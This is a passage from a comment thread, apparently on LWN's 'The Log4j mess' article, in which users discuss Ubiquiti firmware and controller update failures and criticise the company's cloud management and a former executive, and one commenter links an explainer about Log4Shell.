What devices do you use where this has been a problem? For me, the only issue I've ever had with updating the controller and firmware was when I had to switch my inform URL to non-HTTPS temporarily, to get out of a circular problem where I couldn't update my USG firmware to a version that would support the new style letsencrypt certificates. Other than that's it's been bulletproof for me.

I'm using a USG and some UAC-AC-PROs, so I'm interested in seeing what hardware I should avoid buying in the future!

The Log4j mess

Posted Dec 14, 2021 21:12 UTC (Tue) by nix (subscriber, #2304) [Link] (1 responses)

Original UAP. Four bricking incidents in the last two years, all thank god recoverable via TFTP. Three incidents of major functionality breakage like completely fubaring broadcasts. Not one fix reported in the horrible excuse for changelogs they emit these days. I don't upgrade the firmware any more, and since two controller updates led to UAPs that were no longer adoptable I don't upgrade the controller any more either.

Ubiquiti has *really* gone downhill -- and that's before we discovered that the head of cloud there was an extortionist who got his position by basically lying nonstop to the (apparently clueless) CEO and terrifying him and who then proceeded to try to extort money out of his employer and possibly (? it remains unclear) actually was the source of a credentials compromise: he was also said to be so unpleasant to work with that he was a major reason why most of the competent developers Ubiquiti employed reportedly left, leaving their software development in a seriously parlous state.

Ubiquiti have been very hot on trying to do absolutely all their admin via cloudy stuff, which was extremely questionable in any case for *networking* gear, i.e. the stuff which needs to be properly configured if you're to get to the cloud in the first place -- but now that it turns out that the head cloudy guy was *this* sort of person, one wonders if the whole thing was encouraged in the first place specifically to get lots of juicy credentials from lots of people.

The Log4j mess

Posted Dec 15, 2021 9:05 UTC (Wed) by smurf (subscriber, #17840) [Link]

which is why I only use Ubiquity hardware which can be (and in fact is, five minutes after unboxing) reflashed to run OpenWRT.

The Log4j mess

Posted Dec 13, 2021 3:51 UTC (Mon) by net_benji (subscriber, #75195) [Link] (1 responses)

I didn't understand the link with LDAP from the ArsTechnica article but the following summary explains it more clearly:
https://www.fastly.com/blog/digging-deeper-into-log4shell...

The Log4j mess

Posted Dec 13, 2021 23:24 UTC (Mon) by camhusmj38 (subscriber, #99234) [Link]

Thanks for sharing this. It was very useful